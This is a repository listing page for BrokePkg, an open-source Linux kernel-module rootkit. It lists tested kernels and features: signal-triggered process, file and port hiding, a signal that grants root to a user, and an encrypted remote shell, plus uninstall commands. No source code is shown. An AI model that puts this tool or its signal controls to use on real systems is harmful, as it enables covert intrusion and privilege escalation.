  • Stars: 121
  • Rank: 293,924 (Top 6 %)
  • Language: C
  • License: MIT License
  • Created over 3 years ago
  • Updated over 1 year ago


Repository Details

The LKM rootkit working in Linux Kernels 2.6.x/3.x/4.x/5.x

BrokePkg

Brokepkg is an LKM rootkit for Linux kernels 2.6.x/3.x/4.x/5.x and ARM64, with support for kernels after 5.7, which no longer export kallsyms_lookup_name.

Tested on

Each entry below is the output of: echo $(head -1 /etc/os-release|tr -d '"'|cut -d= -f2): $(uname -r)
  • Ubuntu 23.04: 6.2.0-26-generic
  • Ubuntu 22.04.1 LTS: 5.17.0-1026-oem
  • Arch Linux: 5.13.12-arch1-1
  • Kali Linux: 5.10.0-kali3-amd64
  • Linux Mint: 4.19.0-8-amd64
  • Ubuntu 18.04.6 LTS: 4.15.0-194-generic
  • Debian 9 (stretch): 4.9.0-15-amd64
  • Ubuntu 16.04.6 LTS: 4.4.0-142-generic

Features

  • Hide/unhide any process by sending it signal 63;
  • Sending signal 31 (to any PID) toggles the module between visible and invisible;
  • Sending signal 64 (to any PID) makes the given user root;
  • Files or directories whose names contain MAGIC_HIDE become invisible;
  • Sending signal 62 to a port number makes that port invisible;
  • Full TTY/PTY shell, with traffic encrypted using OpenSSL.

Install

To install the rootkit, see this wiki page

Usage

You can see a usage manual here

Uninstall

To uninstall, first make brokepkg visible again:

kill -31 0

Then remove the module:

sudo rmmod brokepkg

References